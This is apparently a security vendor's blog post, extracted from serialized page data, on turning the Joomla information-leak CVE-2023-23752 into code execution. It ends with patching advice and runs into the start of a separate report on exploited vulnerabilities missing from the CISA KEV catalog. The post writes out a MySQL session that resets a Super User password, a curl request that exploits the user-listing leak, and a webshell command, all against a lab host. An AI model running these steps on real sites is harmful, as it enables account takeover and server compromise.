Joomla","\u002Fblog\u002Fjoomla-for-rce\u002Fcensys-joomla-mysql.png",[18,105109,105110,105111,105116],{},"An attacker with credentials to the MySQL server won’t automatically be able to execute arbitrary code. 
Old MySQL ",[47,105112,105115],{"href":105113,"rel":105114},"https:\u002F\u002Fsqlwiki.netspi.com\u002FattackQueries\u002FreadingAndWritingFiles\u002F#mysql",[51],"attack techniques"," that manipulate local files should be unusable on any modern and\u002For decently configured server. But access to the MySQL server should still provide a path to code execution.",[18,105118,105119,105120,105125],{},"Access to the database allows the attacker to change the Joomla! Super User’s password. Joomla! even ",[47,105121,105124],{"href":105122,"rel":105123},"https:\u002F\u002Fdocs.joomla.org\u002FHow_do_you_recover_or_reset_your_admin_password%3F#Change_the_Password_in_the_Database",[51],"documents"," how this can be done using only database access. The following demonstrates the password change to “secret” using the MySQL client.",[1354,105127,105129],{"className":31740,"code":105128,"language":2186,"meta":219,"style":219},"mysql> use joomla_db;\nReading table information for completion of table and column names\nYou can turn off this feature to get a quicker startup with -A\n\nDatabase changed\nmysql> show tables;\n+-------------------------------+\n| Tables_in_joomla_db           |\n+-------------------------------+\n| xj3n0_action_log_config       |\n| xj3n0_action_logs     \n… truncated …\nmysql> select * from xj3n0_users;\n+-----+------+---------------+-----------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+--------+---------------+------------+--------+------+--------------+--------------+\n| id  | name | username     | email                 | password                                                  | block | sendEmail | registerDate      | lastvisitDate     | activation | params | lastResetTime | resetCount | otpKey | otep | requireReset | authProvider 
|\n+-----+------+---------------+-----------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+--------+---------------+------------+--------+------+--------------+--------------+\n| 552 | jake | albinolobster | albinolobster@vulncheck.com | $2y$10$GL9tEHKez5Wa6sr2CjXXmetAr6cOOo7DpE9j1KaeJCIy1UwnaYUVO |     0 |         1 | 2023-03-17 15:07:45 | 2023-03-17 16:41:04 | 0       |       | NULL          |       0 |     |   |           0 |             |\n+-----+------+---------------+-----------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+--------+---------------+------------+--------+------+--------------+--------------+\n1 row in set (0.00 sec)\n\nmysql> Update xj3n0_users SET password = \"d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199\" WHERE id=552;\nQuery OK, 1 row affected (0.00 sec)\nRows matched: 1  Changed: 1  Warnings: 0\n\nmysql>\n",[886,105130,105131,105144,105171,105207,105211,105219,105233,105238,105248,105252,105262,105271,105282,105299,105304,105392,105396,105481,105485,105505,105509,105543,105564,105584,105588],{"__ignoreMap":219},[1373,105132,105133,105135,105137,105139,105142],{"class":1375,"line":1376},[1373,105134,48715],{"class":2206},[1373,105136,69588],{"class":4640},[1373,105138,4976],{"class":1391},[1373,105140,105141],{"class":1391}," joomla_db",[1373,105143,4912],{"class":1383},[1373,105145,105146,105149,105151,105154,105156,105159,105161,105163,105165,105168],{"class":1375,"line":220},[1373,105147,105148],{"class":2206},"Reading",[1373,105150,88158],{"class":1391},[1373,105152,105153],{"class":1391}," information",[1373,105155,55807],{"class":1391},[1373,105157,105158],{"class":1391}," 
completion",[1373,105160,55815],{"class":1391},[1373,105162,88158],{"class":1391},[1373,105164,67041],{"class":1391},[1373,105166,105167],{"class":1391}," column",[1373,105169,105170],{"class":1391}," names\n",[1373,105172,105173,105176,105178,105181,105184,105186,105189,105191,105194,105196,105199,105202,105204],{"class":1375,"line":1266},[1373,105174,105175],{"class":2206},"You",[1373,105177,39106],{"class":1391},[1373,105179,105180],{"class":1391}," turn",[1373,105182,105183],{"class":1391}," off",[1373,105185,69476],{"class":1391},[1373,105187,105188],{"class":1391}," feature",[1373,105190,55503],{"class":1391},[1373,105192,105193],{"class":1391}," get",[1373,105195,52105],{"class":1391},[1373,105197,105198],{"class":1391}," quicker",[1373,105200,105201],{"class":1391}," startup",[1373,105203,57424],{"class":1391},[1373,105205,105206],{"class":2209}," -A\n",[1373,105208,105209],{"class":1375,"line":1852},[1373,105210,6520],{"emptyLinePlaceholder":237},[1373,105212,105213,105216],{"class":1375,"line":4692},[1373,105214,105215],{"class":2206},"Database",[1373,105217,105218],{"class":1391}," changed\n",[1373,105220,105221,105223,105225,105228,105231],{"class":1375,"line":4724},[1373,105222,48715],{"class":2206},[1373,105224,69588],{"class":4640},[1373,105226,105227],{"class":1391},"show",[1373,105229,105230],{"class":1391}," tables",[1373,105232,4912],{"class":1383},[1373,105234,105235],{"class":1375,"line":4756},[1373,105236,105237],{"class":2206},"+-------------------------------+\n",[1373,105239,105240,105242,105245],{"class":1375,"line":4768},[1373,105241,17472],{"class":1397},[1373,105243,105244],{"class":2206}," Tables_in_joomla_db",[1373,105246,105247],{"class":1397},"           |\n",[1373,105249,105250],{"class":1375,"line":4792},[1373,105251,105237],{"class":2206},[1373,105253,105254,105256,105259],{"class":1375,"line":4798},[1373,105255,17472],{"class":1397},[1373,105257,105258],{"class":2206}," 
xj3n0_action_log_config",[1373,105260,105261],{"class":1397},"       |\n",[1373,105263,105264,105266,105269],{"class":1375,"line":4806},[1373,105265,17472],{"class":1397},[1373,105267,105268],{"class":2206}," xj3n0_action_logs",[1373,105270,47154],{"class":4640},[1373,105272,105273,105276,105279],{"class":1375,"line":4817},[1373,105274,105275],{"class":2206},"…",[1373,105277,105278],{"class":1391}," truncated",[1373,105280,105281],{"class":1391}," …\n",[1373,105283,105284,105286,105288,105290,105292,105294,105297],{"class":1375,"line":4825},[1373,105285,48715],{"class":2206},[1373,105287,69588],{"class":4640},[1373,105289,49878],{"class":1391},[1373,105291,19113],{"class":6761},[1373,105293,67067],{"class":1391},[1373,105295,105296],{"class":1391}," xj3n0_users",[1373,105298,4912],{"class":1383},[1373,105300,105301],{"class":1375,"line":4835},[1373,105302,105303],{"class":2206},"+-----+------+---------------+-----------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+--------+---------------+------------+--------+------+--------------+--------------+\n",[1373,105305,105306,105308,105310,105312,105314,105316,105318,105321,105324,105327,105329,105332,105335,105337,105340,105342,105345,105348,105351,105353,105356,105358,105360,105362,105365,105367,105370,105372,105375,105377,105380,105382,105385,105387,105390],{"class":1375,"line":4843},[1373,105307,17472],{"class":1397},[1373,105309,7911],{"class":2206},[1373,105311,79154],{"class":1397},[1373,105313,46496],{"class":2206},[1373,105315,2233],{"class":1397},[1373,105317,90283],{"class":2206},[1373,105319,105320],{"class":1397},"     |",[1373,105322,105323],{"class":2206}," email",[1373,105325,105326],{"class":1397},"                 |",[1373,105328,90288],{"class":2206},[1373,105330,105331],{"class":1397},"                                                  |",[1373,105333,105334],{"class":2206}," 
block",[1373,105336,2233],{"class":1397},[1373,105338,105339],{"class":2206}," sendEmail",[1373,105341,2233],{"class":1397},[1373,105343,105344],{"class":2206}," registerDate",[1373,105346,105347],{"class":1397},"      |",[1373,105349,105350],{"class":2206}," lastvisitDate",[1373,105352,105320],{"class":1397},[1373,105354,105355],{"class":2206}," activation",[1373,105357,2233],{"class":1397},[1373,105359,20901],{"class":2206},[1373,105361,2233],{"class":1397},[1373,105363,105364],{"class":2206}," lastResetTime",[1373,105366,2233],{"class":1397},[1373,105368,105369],{"class":2206}," resetCount",[1373,105371,2233],{"class":1397},[1373,105373,105374],{"class":2206}," otpKey",[1373,105376,2233],{"class":1397},[1373,105378,105379],{"class":2206}," otep",[1373,105381,2233],{"class":1397},[1373,105383,105384],{"class":2206}," requireReset",[1373,105386,2233],{"class":1397},[1373,105388,105389],{"class":2206}," authProvider",[1373,105391,61075],{"class":1397},[1373,105393,105394],{"class":1375,"line":4849},[1373,105395,105303],{"class":2206},[1373,105397,105398,105400,105403,105405,105408,105410,105413,105415,105418,105420,105423,105425,105428,105430,105433,105435,105438,105441,105443,105445,105448,105450,105452,105455,105457,105460,105463,105466,105468,105470,105473,105476,105478],{"class":1375,"line":4877},[1373,105399,17472],{"class":1397},[1373,105401,105402],{"class":2206}," 552",[1373,105404,2233],{"class":1397},[1373,105406,105407],{"class":2206}," jake",[1373,105409,2233],{"class":1397},[1373,105411,105412],{"class":2206}," albinolobster",[1373,105414,2233],{"class":1397},[1373,105416,105417],{"class":2206}," albinolobster@vulncheck.com",[1373,105419,2233],{"class":1397},[1373,105421,105422],{"class":4640}," $2y$10$GL9tEHKez5Wa6sr2CjXXmetAr6cOOo7DpE9j1KaeJCIy1UwnaYUVO ",[1373,105424,17472],{"class":1397},[1373,105426,105427],{"class":2206},"     0",[1373,105429,2233],{"class":1397},[1373,105431,105432],{"class":2206},"         
1",[1373,105434,2233],{"class":1397},[1373,105436,105437],{"class":2206}," 2023-03-17",[1373,105439,105440],{"class":1391}," 15:07:45",[1373,105442,2233],{"class":1397},[1373,105444,105437],{"class":2206},[1373,105446,105447],{"class":1391}," 16:41:04",[1373,105449,2233],{"class":1397},[1373,105451,5557],{"class":2206},[1373,105453,105454],{"class":1397},"       |",[1373,105456,105454],{"class":1397},[1373,105458,105459],{"class":2206}," NULL",[1373,105461,105462],{"class":1397},"          |",[1373,105464,105465],{"class":2206},"       0",[1373,105467,2233],{"class":1397},[1373,105469,105320],{"class":1397},[1373,105471,105472],{"class":1397},"   |",[1373,105474,105475],{"class":2206},"           0",[1373,105477,2233],{"class":1397},[1373,105479,105480],{"class":1397},"             |\n",[1373,105482,105483],{"class":1375,"line":4915},[1373,105484,105303],{"class":2206},[1373,105486,105487,105489,105492,105494,105497,105500,105503],{"class":1375,"line":4931},[1373,105488,467],{"class":2206},[1373,105490,105491],{"class":1391}," row",[1373,105493,57301],{"class":1391},[1373,105495,105496],{"class":1391}," set",[1373,105498,105499],{"class":4640}," (0.00 ",[1373,105501,105502],{"class":1391},"sec",[1373,105504,11875],{"class":4640},[1373,105506,105507],{"class":1375,"line":4947},[1373,105508,6520],{"emptyLinePlaceholder":237},[1373,105510,105511,105513,105515,105517,105519,105522,105524,105526,105528,105531,105533,105535,105538,105541],{"class":1375,"line":4952},[1373,105512,48715],{"class":2206},[1373,105514,69588],{"class":4640},[1373,105516,20713],{"class":1391},[1373,105518,105296],{"class":1391},[1373,105520,105521],{"class":1391}," SET",[1373,105523,90288],{"class":1391},[1373,105525,8575],{"class":1391},[1373,105527,4883],{"class":1387},[1373,105529,105530],{"class":1391},"d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199",[1373,105532,183],{"class":1387},[1373,105534,7908],{"class":1391},[1373,105536,105537],{"class":1391}," 
id=",[1373,105539,105540],{"class":5467},"552",[1373,105542,4912],{"class":1383},[1373,105544,105545,105548,105551,105553,105555,105558,105560,105562],{"class":1375,"line":6776},[1373,105546,105547],{"class":2206},"Query",[1373,105549,105550],{"class":1391}," OK,",[1373,105552,5468],{"class":5467},[1373,105554,105491],{"class":1391},[1373,105556,105557],{"class":1391}," affected",[1373,105559,105499],{"class":4640},[1373,105561,105502],{"class":1391},[1373,105563,11875],{"class":4640},[1373,105565,105566,105569,105572,105574,105577,105579,105582],{"class":1375,"line":6781},[1373,105567,105568],{"class":2206},"Rows",[1373,105570,105571],{"class":1391}," matched:",[1373,105573,5468],{"class":5467},[1373,105575,105576],{"class":1391},"  Changed:",[1373,105578,5468],{"class":5467},[1373,105580,105581],{"class":1391},"  Warnings:",[1373,105583,86581],{"class":5467},[1373,105585,105586],{"class":1375,"line":7524},[1373,105587,6520],{"emptyLinePlaceholder":237},[1373,105589,105590,105592],{"class":1375,"line":7530},[1373,105591,48715],{"class":2206},[1373,105593,6765],{"class":4640},[18,105595,105596],{},"The attacker can then log into the Joomla! administrative web interface. As the Super User, the attacker has two easy paths to execute arbitrary code.",[1789,105598,105599],{},[25,105600,105601,105606,105607,105610,105611,105614,105615,2230],{},[47,105602,105605],{"href":105603,"rel":105604},"https:\u002F\u002Fbook.hacktricks.xyz\u002Fnetwork-services-pentesting\u002Fpentesting-web\u002Fjoomla",[51],"Modify a template"," to include malicious PHP. The image below demonstrates the addition of a tiny webshell to ",[886,105608,105609],{},"index.php",". This will allow the attacker to execute arbitrary code as the ",[886,105612,105613],{},"www-data"," user by sending requests to the instance’s landing page (e.g. ",[886,105616,105617],{},"curl -k http:\u002F\u002F10.9.49.205\u002F?cmd=whoami",[18,105619,105620],{},[68,105621],{":width":10862,"alt":105622,"src":105623},"Joomla! 
Webshell in Template Editor","\u002Fblog\u002Fjoomla-for-rce\u002Fjoomla-webshell.png",[1789,105625,105626],{},[25,105627,105628,105629,59],{},"Install a malicious plugin such as ",[47,105630,105633],{"href":105631,"rel":105632},"https:\u002F\u002Fgithub.com\u002Fp0dalirius\u002FJoomla-webshell-plugin",[51],"Joomla-webshell-plugin",[18,105635,105636],{},"Both are viable options. Both are achievable because the MySQL credential leak allows the attacker to take over a Super User account. That isn’t the only way though. CVE-2023-23752 provides a second method for chasing after a Super User account.",[61,105638,105640],{"id":105639},"cve-2023-23752-to-code-execution-2","CVE-2023-23752 to Code Execution #2",[18,105642,105643],{},"Instead of leaking the MySQL credentials, the attacker can leak the Joomla! user database using CVE-2023-23752:",[1354,105645,105647],{"className":31740,"code":105646,"language":2186,"meta":219,"style":219},"curl -v http:\u002F\u002F10.9.49.205\u002Fapi\u002Findex.php\u002Fv1\u002Fusers?public=true\n*   Trying 10.9.49.205:80...\n* TCP_NODELAY set\n* Connected to 10.9.49.205 (10.9.49.205) port 80 (#0)\n> GET \u002Fapi\u002Findex.php\u002Fv1\u002Fusers?public=true HTTP\u002F1.1\n> Host: 10.9.49.205\n> User-Agent: curl\u002F7.68.0\n> Accept: *\u002F*\n>\n* Mark bundle as not supporting multiuse\n\u003C HTTP\u002F1.1 200 OK\n\u003C Date: Mon, 20 Mar 2023 16:11:38 GMT\n\u003C Server: Apache\u002F2.4.41 (Ubuntu)\n\u003C x-frame-options: SAMEORIGIN\n\u003C referrer-policy: strict-origin-when-cross-origin\n\u003C cross-origin-opener-policy: same-origin\n\u003C X-Powered-By: JoomlaAPI\u002F1.0\n\u003C Expires: Wed, 17 Aug 2005 00:00:00 GMT\n\u003C Last-Modified: Mon, 20 Mar 2023 16:11:38 GMT\n\u003C Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\n\u003C Pragma: no-cache\n\u003C Content-Length: 418\n\u003C Content-Type: application\u002Fvnd.api+json; charset=utf-8\n\u003C\n* Connection #0 to host 10.9.49.205 left 
intact\n{\"links\":{\"self\":\"http:\\\u002F\\\u002F10.9.49.205\\\u002Fapi\\\u002Findex.php\\\u002Fv1\\\u002Fusers?public=true\"},\"data\":[{\"type\":\"users\",\"id\":\"552\",\"attributes\":{\"id\":552,\"name\":\"jake\",\"username\":\"albinolobster\",\"email\":\"albinolobster@vulncheck.com\",\"block\":0,\"sendEmail\":1,\"registerDate\":\"2023-03-17 15:07:45\",\"lastvisitDate\":\"2023-03-20 15:35:58\",\"lastResetTime\":null,\"resetCount\":0,\"group_count\":1,\"group_names\":\"Super Users\"}}],\"meta\":{\"total-pages\":1}\n",[886,105648,105649,105660,105666,105672,105682,105695,105701,105707,105719,105723,105729,105735,105742,105752,105758,105764,105770,105776,105782,105789,105805,105811,105818,105832,105836,105845],{"__ignoreMap":219},[1373,105650,105651,105653,105655,105658],{"class":1375,"line":1376},[1373,105652,1557],{"class":2206},[1373,105654,45584],{"class":2209},[1373,105656,105657],{"class":1391}," http:\u002F\u002F10.9.49.205\u002Fapi\u002Findex.php\u002Fv1\u002Fusers?public=",[1373,105659,45801],{"class":7054},[1373,105661,105662,105664],{"class":1375,"line":220},[1373,105663,35613],{"class":1397},[1373,105665,103929],{"class":4640},[1373,105667,105668,105670],{"class":1375,"line":1266},[1373,105669,35613],{"class":1397},[1373,105671,76077],{"class":4640},[1373,105673,105674,105676,105678,105680],{"class":1375,"line":1852},[1373,105675,35613],{"class":1397},[1373,105677,103942],{"class":4640},[1373,105679,103945],{"class":2206},[1373,105681,88981],{"class":4640},[1373,105683,105684,105686,105688,105691,105693],{"class":1375,"line":4692},[1373,105685,5384],{"class":1397},[1373,105687,76097],{"class":2206},[1373,105689,105690],{"class":1391}," 
\u002Fapi\u002Findex.php\u002Fv1\u002Fusers?public=",[1373,105692,10874],{"class":7054},[1373,105694,35589],{"class":1391},[1373,105696,105697,105699],{"class":1375,"line":4724},[1373,105698,5384],{"class":1397},[1373,105700,103967],{"class":4640},[1373,105702,105703,105705],{"class":1375,"line":4756},[1373,105704,5384],{"class":1397},[1373,105706,35603],{"class":4640},[1373,105708,105709,105711,105713,105715,105717],{"class":1375,"line":4768},[1373,105710,5384],{"class":1397},[1373,105712,35610],{"class":4640},[1373,105714,35613],{"class":1397},[1373,105716,2180],{"class":4640},[1373,105718,35618],{"class":1397},[1373,105720,105721],{"class":1375,"line":4792},[1373,105722,6765],{"class":1397},[1373,105724,105725,105727],{"class":1375,"line":4798},[1373,105726,35613],{"class":1397},[1373,105728,76148],{"class":4640},[1373,105730,105731,105733],{"class":1375,"line":4806},[1373,105732,11852],{"class":1397},[1373,105734,89055],{"class":4640},[1373,105736,105737,105739],{"class":1375,"line":4817},[1373,105738,11852],{"class":1397},[1373,105740,105741],{"class":4640}," Date: Mon, 20 Mar 2023 16:11:38 
GMT\n",[1373,105743,105744,105746,105748,105750],{"class":1375,"line":4825},[1373,105745,11852],{"class":1397},[1373,105747,104015],{"class":4640},[1373,105749,104018],{"class":2206},[1373,105751,11875],{"class":4640},[1373,105753,105754,105756],{"class":1375,"line":4835},[1373,105755,11852],{"class":1397},[1373,105757,104027],{"class":4640},[1373,105759,105760,105762],{"class":1375,"line":4843},[1373,105761,11852],{"class":1397},[1373,105763,104034],{"class":4640},[1373,105765,105766,105768],{"class":1375,"line":4849},[1373,105767,11852],{"class":1397},[1373,105769,104041],{"class":4640},[1373,105771,105772,105774],{"class":1375,"line":4877},[1373,105773,11852],{"class":1397},[1373,105775,104048],{"class":4640},[1373,105777,105778,105780],{"class":1375,"line":4915},[1373,105779,11852],{"class":1397},[1373,105781,104055],{"class":4640},[1373,105783,105784,105786],{"class":1375,"line":4931},[1373,105785,11852],{"class":1397},[1373,105787,105788],{"class":4640}," Last-Modified: Mon, 20 Mar 2023 16:11:38 GMT\n",[1373,105790,105791,105793,105795,105797,105799,105801,105803],{"class":1375,"line":4947},[1373,105792,11852],{"class":1397},[1373,105794,104069],{"class":4640},[1373,105796,5417],{"class":1397},[1373,105798,104074],{"class":1391},[1373,105800,104077],{"class":4640},[1373,105802,5417],{"class":1397},[1373,105804,104082],{"class":1391},[1373,105806,105807,105809],{"class":1375,"line":4952},[1373,105808,11852],{"class":1397},[1373,105810,104089],{"class":4640},[1373,105812,105813,105815],{"class":1375,"line":6776},[1373,105814,11852],{"class":1397},[1373,105816,105817],{"class":4640}," Content-Length: 
418\n",[1373,105819,105820,105822,105824,105826,105828,105830],{"class":1375,"line":6781},[1373,105821,11852],{"class":1397},[1373,105823,104103],{"class":4640},[1373,105825,39663],{"class":1383},[1373,105827,48986],{"class":4640},[1373,105829,5417],{"class":1397},[1373,105831,104112],{"class":1391},[1373,105833,105834],{"class":1375,"line":7524},[1373,105835,35662],{"class":1397},[1373,105837,105838,105840,105842],{"class":1375,"line":7530},[1373,105839,35613],{"class":1397},[1373,105841,76330],{"class":4640},[1373,105843,105844],{"class":4630},"#0 to host 10.9.49.205 left intact\n",[1373,105846,105847,105849,105851,105853,105855,105857,105859,105861,105864,105866,105868,105870,105872,105874,105876,105878,105881,105883,105885,105887,105889,105891,105893,105895,105897,105900,105902,105904,105907,105909,105911,105913,105916,105918,105921,105923,105926,105928,105930,105932,105935,105937,105940,105942,105945,105947,105949,105951,105953,105956,105958,105960,105962,105965,105968,105970,105972,105974,105977,105979,105982,105984,105987,105989,105992,105994,105997,105999,106001,106003,106006,106008,106010,106012,106015,106018,106020,106023,106025,106027,106029,106031,106033,106035,106037],{"class":1375,"line":7546},[1373,105848,9149],{"class":1383},[1373,105850,104123],{"class":2206},[1373,105852,4606],{"class":1379},[1373,105854,9149],{"class":1391},[1373,105856,183],{"class":4640},[1373,105858,76212],{"class":2206},[1373,105860,104134],{"class":2206},[1373,105862,105863],{"class":2206},"http:\\\u002F\\\u002F10.9.49.205\\\u002Fapi\\\u002Findex.php\\\u002Fv1\\\u002Fusers?public",[1373,105865,5417],{"class":1391},[1373,105867,10874],{"class":1379},[1373,105869,104198],{"class":2206},[1373,105871,9156],{"class":2206},[1373,105873,104203],{"class":2206},[1373,105875,26399],{"class":1379},[1373,105877,104134],{"class":2206},[1373,105879,105880],{"class":2206},"users",[1373,105882,104144],{"class":2206},[1373,105884,26412],{"class":2206},[1373,105886,104134],{"class":2206},[1373
,105888,105540],{"class":2206},[1373,105890,104144],{"class":2206},[1373,105892,104224],{"class":2206},[1373,105894,104227],{"class":2206},[1373,105896,26412],{"class":2206},[1373,105898,105899],{"class":2206},"\":552,\"",[1373,105901,30774],{"class":2206},[1373,105903,104134],{"class":2206},[1373,105905,105906],{"class":2206},"jake",[1373,105908,104144],{"class":2206},[1373,105910,4870],{"class":2206},[1373,105912,104134],{"class":2206},[1373,105914,105915],{"class":2206},"albinolobster",[1373,105917,104144],{"class":2206},[1373,105919,105920],{"class":2206},"email",[1373,105922,104134],{"class":2206},[1373,105924,105925],{"class":2206},"albinolobster@vulncheck.com",[1373,105927,104144],{"class":2206},[1373,105929,10876],{"class":2206},[1373,105931,105037],{"class":2206},[1373,105933,105934],{"class":2206},"sendEmail",[1373,105936,104722],{"class":2206},[1373,105938,105939],{"class":2206},"registerDate",[1373,105941,104134],{"class":2206},[1373,105943,105944],{"class":2206},"2023-03-17",[1373,105946,105440],{"class":1391},[1373,105948,183],{"class":1387},[1373,105950,5437],{"class":1391},[1373,105952,183],{"class":1387},[1373,105954,105955],{"class":1391},"lastvisitDate",[1373,105957,183],{"class":1387},[1373,105959,4606],{"class":1391},[1373,105961,183],{"class":1387},[1373,105963,105964],{"class":1391},"2023-03-20",[1373,105966,105967],{"class":1391}," 
15:35:58",[1373,105969,183],{"class":1387},[1373,105971,5437],{"class":1391},[1373,105973,183],{"class":1387},[1373,105975,105976],{"class":1391},"lastResetTime",[1373,105978,183],{"class":1387},[1373,105980,105981],{"class":1391},":null,",[1373,105983,183],{"class":1387},[1373,105985,105986],{"class":1391},"resetCount",[1373,105988,183],{"class":1387},[1373,105990,105991],{"class":1391},":0,",[1373,105993,183],{"class":1387},[1373,105995,105996],{"class":1391},"group_count",[1373,105998,183],{"class":1387},[1373,106000,104363],{"class":1391},[1373,106002,183],{"class":1387},[1373,106004,106005],{"class":1391},"group_names",[1373,106007,183],{"class":1387},[1373,106009,4606],{"class":1391},[1373,106011,183],{"class":1387},[1373,106013,106014],{"class":1391},"Super",[1373,106016,106017],{"class":1391}," Users",[1373,106019,183],{"class":1387},[1373,106021,106022],{"class":1391},"}}],",[1373,106024,183],{"class":1387},[1373,106026,48983],{"class":1391},[1373,106028,183],{"class":1387},[1373,106030,8304],{"class":1391},[1373,106032,183],{"class":1387},[1373,106034,105078],{"class":1391},[1373,106036,183],{"class":1387},[1373,106038,106039],{"class":1391},":1}\n",[18,106041,106042,106043,106046,106047,106052],{},"The database output contains usernames, emails, and assigned group (e.g. ",[886,106044,106045],{},"Super Users","). This should be enough for credential stuffing or ",[47,106048,106051],{"href":106049,"rel":106050},"https:\u002F\u002Fgithub.com\u002Fajnik\u002Fjoomla-bruteforce",[51],"brute forcing"," to achieve Super User access. Some bad administrators might even reuse the MySQL password for the Super User account. Either way, this additional leak has the added benefit of not relying on MySQL being reachable. 
Once Super User access is achieved, the attacker can follow the previously discussed paths to code execution.",[61,106054,1903],{"id":1902},[18,106056,106057,106058,106062],{},"CVE-2023-23752 is an authentication bypass resulting in an information leak on Joomla! servers. Although rated as a CVSSv3 5.3 (Medium severity) by ",[47,106059,106061],{"href":103801,"rel":106060},[51],"NVD",", this vulnerability could allow an attacker to achieve code execution under the right circumstances. That likely justifies the interest attackers have shown in this vulnerability.",[18,106064,106065],{},"The total number of vulnerable servers was never high and patching has occurred at a good rate. However, anyone using Joomla! Version 4 should probably consider rotating all passwords. Additionally, examining template files for webshells and auditing all installed plugins would be beneficial.",[2901,106067,106068],{},"",{"title":219,"searchDepth":220,"depth":220,"links":106070},[106071,106072,106073,106074],{"id":103831,"depth":220,"text":103832},{"id":103902,"depth":220,"text":103903},{"id":105639,"depth":220,"text":105640},{"id":1902,"depth":220,"text":1903},"2023-03-23","CVE-2023-23752 is an information leak affecting Joomla! 4.0 - 4.7. How can an attacker use this vulnerability to achieve code execution? How many internet-facing systems are at risk?",{"slug":106078},"joomla-for-rce","\u002Fblog\u002Fjoomla-for-rce",{"title":103782,"description":106076},"blog\u002Fjoomla-for-rce",[242,23275],"i1yy6IGkS6McuqKpVy9M1mQJK39kG46YE6Rq-W42DJ4",{"id":106085,"title":106086,"articles":106087,"authors":106108,"body":106110,"date":106091,"description":107042,"extension":234,"image":7,"link":7,"meta":107043,"navigation":237,"path":107048,"seo":107049,"series":7,"stem":107050,"subtype":7,"tags":107051,"__hash__":107052},"blog\u002Fblog\u002F2022-missing-kev-report.md","The VulnCheck 2022 Exploited Vulnerability Report - Missing CISA KEV Catalog Entries - Blog - VulnCheck Catalog Entries",[106088,106092,106095,106098,106101,106104],{"title":106089,"source":3494,"link":106090,"date":106091},"Risky Biz News: ODNI report highlights China as the US' biggest cyber 
threat","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Frisky-biz-news-odni-report-highlights?utm_source=substack&utm_medium=email","2023-03-09",{"title":106093,"source":11233,"link":106094,"date":106091},"Nearly 900 flaws listed in CISA vulnerability catalog","https:\u002F\u002Fwww.scmagazine.com\u002Fbrief\u002Fthreat-intelligence\u002Fnearly-900-flaws-listed-in-cisa-vulnerability-catalog",{"title":106096,"source":14378,"link":106097,"date":106091},"Dozens of Exploited Vulnerabilities Missing From CISA ‘Must Patch’ List","https:\u002F\u002Fwww.securityweek.com\u002Fdozens-of-exploited-vulnerabilities-missing-from-cisa-must-patch-list\u002F",{"title":106099,"source":12162,"link":106100,"date":106091},"VulnCheck: CISA's KEV missing 42 vulnerabilities from 2022","https:\u002F\u002Fwww.techtarget.com\u002Fsearchsecurity\u002Fnews\u002F365532199\u002FVulnCheck-CISAs-KEV-missing-42-vulnerabilities-from-2022",{"title":106102,"source":39566,"link":106103,"date":106091},"A wormable PlugX variant. Abusing legitimate services. Compromised webcams. Emotet is back. BlackMamba POC. Hybrid war.","https:\u002F\u002Fthecyberwire.com\u002Fnewsletters\u002Fdaily-briefing\u002F12\u002F46",{"title":106105,"source":14382,"link":106106,"date":106107},"Alert: Active Exploitation of TP-Link, Apache, and Oracle Vulnerabilities Detected","https:\u002F\u002Fthehackernews.com\u002F2023\u002F05\u002Factive-exploitation-of-tp-link-apache.html","2023-05-02",[106109],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":106111,"toc":107030},[106112,106117,106125,106129,106133,106136,106143,106175,106178,106782,106784,106787,106792,106796,106799,106827,106831,106834,106839,106843,106863,106866,106871,106875,106879,106882,106886,106911,106924,106931,106940,106943,106957,106969,106972,106985,106988,106991,107002,107011,107020,107022,107025],[18,106113,106114],{},[1131,106115,106116],{},"The data in this report was generated on March 2, 2023. 
Any additions to the CISA KEV Catalog after that date are not reflected in this report.",[18,106118,58229,106119,106124],{},[47,106120,106123],{"href":106121,"rel":106122},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002F2022-cisa-kev-review",[51],"last week’s"," blog, we looked at the vulnerabilities the Cybersecurity and Infrastructure Security Agency (CISA) added to the Known Exploited Vulnerability (KEV) Catalog in 2022. In the report, we mentioned CISA missed some actively exploited vulnerabilities that had been assigned CVEs in 2022. The KEV Catalog is the driving force for vulnerability management in the US federal civilian executive branch, and many private companies have adopted it as the de facto standard. As such, excluding any exploited-in-the-wild vulnerability is a big deal with potentially far-reaching effects. This blog will share 42 likely exploited-in-the-wild vulnerabilities assigned CVEs in 2022 that haven’t been included in the KEV Catalog.",[263,106126],{":list":106127,"ico":266,"title":106128},"[\"VulnCheck identified 42 vulnerabilities that were assigned CVEs in 2022 and reported to have been, or likely to have been, exploited in the wild that were not added to the CISA KEV Catalog.\",\"Of the 42 CVEs, an overwhelming majority are related to botnets (64%). However, there are also a number of ransomware (10%) and threat actor (12%) attributions.\",\"Some missing vulnerabilities, specifically CVE-2016-20016, have been exploited in the wild since 2017 and still have thousands of potential targets online.\",\"76.2% of the missing vulnerabilities were initial access, which VulnCheck recommends prioritizing.\",\"The CISA KEV Catalog is undoubtedly helpful and a driving force in our industry. 
Still, as long as it’s missing actively exploited vulnerabilities, it cannot be treated as the authoritative catalog of exploited vulnerabilities.\"]","The VulnCheck 2022 Exploited Vulnerability Report - Missing CISA KEV",[61,106130,106132],{"id":106131},"the-missing-vulnerabilities","The Missing Vulnerabilities",[18,106134,106135],{},"Using publicly-available reporting, VulnCheck identified 42 vulnerabilities that were assigned CVEs in 2022 and reported to have been, or likely to have been, exploited in the wild. The exploited-in-the-wild sources include a variety of world-class security organizations, including Talos, ESET Research, Avast, FortiGuard Labs, Rapid7, and more.",[18,106137,106138,106139,106142],{},"The public reporting often tells us ",[1131,106140,106141],{},"who"," was doing the exploitation: ransomware, botnets, threat actors, etc. The “who” is essential, as it can change the criticality of a vulnerability. A vulnerability exploited by ransomware is much more concerning than a vulnerability exploited by a Mirai botnet. VulnCheck breaks down the “who” into four general “attacker-type” categories:",[1789,106144,106145,106157,106164,106172],{},[25,106146,106147,106148,1246,106152,106156],{},"Botnets (e.g. 